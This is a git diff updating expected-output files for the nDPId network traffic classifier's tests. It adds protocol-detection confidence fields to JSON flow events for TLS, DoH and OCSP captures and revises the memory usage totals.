{"version":"TLSv1.3","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
-00888{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":948,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822447287,"flow_last_seen":1604822447506,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2172,"flow_avg_l4_payload_len":362,"midstream":0,"ts_msec":1604822447506,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51639,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
-00888{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":952,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822447287,"flow_last_seen":1604822447515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2172,"flow_avg_l4_payload_len":362,"midstream":0,"ts_msec":1604822447515,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51638,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
-00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1604822447287,"flow_last_seen":1604822447869,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":7366,"flow_avg_l4_payload_len":210,"midstream":0,"ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51637,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}}
-00657{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1604822447287,"flow_last_seen":1604822447844,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4320,"flow_avg_l4_payload_len":196,"midstream":0,"ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51638,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}}
-00657{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1604822447287,"flow_last_seen":1604822447839,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4320,"flow_avg_l4_payload_len":196,"midstream":0,"ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51639,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}}
-00612{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1604822444474,"flow_last_seen":1604822444595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":9,"midstream":1,"ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51331,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}}
+00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":829,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822447287,"flow_last_seen":1604822447374,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":712,"flow_tot_l4_payload_len":712,"flow_avg_l4_payload_len":178,"midstream":0,"ts_msec":1604822447374,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51637,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
+00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":840,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822447287,"flow_last_seen":1604822447380,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":712,"flow_tot_l4_payload_len":712,"flow_avg_l4_payload_len":178,"midstream":0,"ts_msec":1604822447380,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51639,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
+00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":841,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822447287,"flow_last_seen":1604822447386,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":712,"flow_tot_l4_payload_len":712,"flow_avg_l4_payload_len":178,"midstream":0,"ts_msec":1604822447386,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51638,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
+00975{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":843,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822447227,"flow_last_seen":1604822447412,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":329,"midstream":0,"ts_msec":1604822447412,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51635,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"951c558a-5e07-47ca-a0c0-225da1b33163.is-cf.help.every1dns.net","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
+00976{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":882,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822447249,"flow_last_seen":1604822447447,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":329,"midstream":0,"ts_msec":1604822447447,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51636,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"951c558a-5e07-47ca-a0c0-225da1b33163.is-doh.help.every1dns.net","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
+00914{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":944,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822447287,"flow_last_seen":1604822447500,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2172,"flow_avg_l4_payload_len":362,"midstream":0,"ts_msec":1604822447500,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51637,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
+00914{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":948,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822447287,"flow_last_seen":1604822447506,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2172,"flow_avg_l4_payload_len":362,"midstream":0,"ts_msec":1604822447506,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51639,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
+00914{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":952,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822447287,"flow_last_seen":1604822447515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2172,"flow_avg_l4_payload_len":362,"midstream":0,"ts_msec":1604822447515,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51638,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1604822447287,"flow_last_seen":1604822447869,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":7366,"flow_avg_l4_payload_len":210,"midstream":0,"ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51637,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}}
+00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1604822447287,"flow_last_seen":1604822447844,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4320,"flow_avg_l4_payload_len":196,"midstream":0,"ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51638,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}}
+00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1604822447287,"flow_last_seen":1604822447839,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4320,"flow_avg_l4_payload_len":196,"midstream":0,"ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51639,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}}
+00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1604822444474,"flow_last_seen":1604822444595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":9,"midstream":1,"ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51331,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1604822444474,"flow_last_seen":1604822444595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":9,"midstream":1,"ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51331,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":268,"flow_first_seen":1604822444486,"flow_last_seen":1604822448523,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":682,"flow_tot_l4_payload_len":17062,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51606,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":785,"flow_first_seen":1604822444913,"flow_last_seen":1604822448604,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":480607,"flow_avg_l4_payload_len":612,"midstream":0,"ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.124.96","src_port":51612,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}}
-00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1604822447227,"flow_last_seen":1604822447785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4696,"flow_avg_l4_payload_len":204,"midstream":0,"ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51635,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}}
-00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1604822447249,"flow_last_seen":1604822447807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4696,"flow_avg_l4_payload_len":204,"midstream":0,"ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51636,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":268,"flow_first_seen":1604822444486,"flow_last_seen":1604822448523,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":682,"flow_tot_l4_payload_len":17062,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51606,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":785,"flow_first_seen":1604822444913,"flow_last_seen":1604822448604,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":480607,"flow_avg_l4_payload_len":612,"midstream":0,"ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.124.96","src_port":51612,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}}
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1604822447227,"flow_last_seen":1604822447785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4696,"flow_avg_l4_payload_len":204,"midstream":0,"ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51635,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}}
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1604822447249,"flow_last_seen":1604822447807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4696,"flow_avg_l4_payload_len":204,"midstream":0,"ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51636,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}}
 00157{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","total-events-serialized":57}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 1185/1185
@@ -63,10 +63,10 @@
 ~~ total active/idle flows...: 8/8
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4656514 bytes
-~~ total memory freed........: 4656514 bytes
-~~ total allocations/frees...: 100785/100785
+~~ total memory allocated....: 4739171 bytes
+~~ total memory freed........: 4739171 bytes
+~~ total allocations/frees...: 102375/102375
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 162 chars
-~~ json string max len.......: 955 chars
-~~ json string avg len.......: 628 chars
+~~ json string max len.......: 981 chars
+~~ json string avg len.......: 641 chars
diff --git a/test/results/ocs.pcap.out b/test/results/ocs.pcap.out
index cfa959376..1cebb959b 100644
--- a/test/results/ocs.pcap.out
+++ b/test/results/ocs.pcap.out
@@ -1900,9 +1900,9 @@
 ~~ total active/idle flows...: 0/0
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4593629 bytes
-~~ total memory freed........: 4593629 bytes
-~~ total allocations/frees...: 99550/99550
+~~ total memory allocated....: 4678910 bytes
+~~ total memory freed........: 4678910 bytes
+~~ total allocations/frees...: 101140/101140
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 157 chars
 ~~ json string max len.......: 2227 chars
diff --git a/test/results/ocsp.pcapng.out b/test/results/ocsp.pcapng.out
index e6d19b369..4c12cf48b 100644
--- a/test/results/ocsp.pcapng.out
+++ b/test/results/ocsp.pcapng.out
@@ -3,62 +3,62 @@
 00530{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1623221248283,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"ts_msec":1623221248283,"pkt":"pJGxgjQ56CrqthSFCABFAAA07YhAAIAG7ObAqAHjbUbwgsKVAFBAnkIeAAAAAIAC+vAOKQAAAgQFtAEDAwgBAQQCGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARhcrEQ=="}
 00522{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1623221248292,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":114,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":114,"pkt_l4_len":28,"ts_msec":1623221248292,"pkt":"6CrqthSFpJGxgjQ5CABFAAAwAABAADUGJXRtRvCCwKgB4wBQwpWhnw3QQJ5CH3ASOQg1lwAAAgQFtAEDAwkZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAx3fu3"}
 00522{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1623221248311,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":112,"pkt_l4_len":20,"ts_msec":1623221248311,"pkt":"pJGxgjQ56CrqthSFCABFAAAo7YlAAIAG7PHAqAHjbUbwgsKVAFBAnkIfoZ8N0VAQAgGYawAAAAAAAAAAGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAjLK1pA=="}
-00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623221248283,"flow_last_seen":1623221248318,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":385,"flow_tot_l4_payload_len":385,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1623221248318,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"109.70.240.130","src_port":49813,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"ocsp07.actalis.it","url":"ocsp07.actalis.it\/VA\/AUTH-ROOT\/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSw4x5v4bTlizjNRmTdkYSy7q0R9gQUUtiIOsifeGbtifN7OHCUyQICNtACEEWXMtjzGMt1k6L0aA%2BQ6tk%3D","code":0,"content_type":"","user_agent":"Microsoft-CryptoAPI\/10.0"}}
-00645{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":24,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1623221248283,"flow_last_seen":1623221313421,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8359,"flow_avg_l4_payload_len":363,"midstream":0,"ts_msec":1623222699655,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"109.70.240.130","src_port":49813,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00896{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623221248283,"flow_last_seen":1623221248318,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":385,"flow_tot_l4_payload_len":385,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1623221248318,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"109.70.240.130","src_port":49813,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"ocsp07.actalis.it","url":"ocsp07.actalis.it\/VA\/AUTH-ROOT\/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSw4x5v4bTlizjNRmTdkYSy7q0R9gQUUtiIOsifeGbtifN7OHCUyQICNtACEEWXMtjzGMt1k6L0aA%2BQ6tk%3D","code":0,"content_type":"","user_agent":"Microsoft-CryptoAPI\/10.0"}}
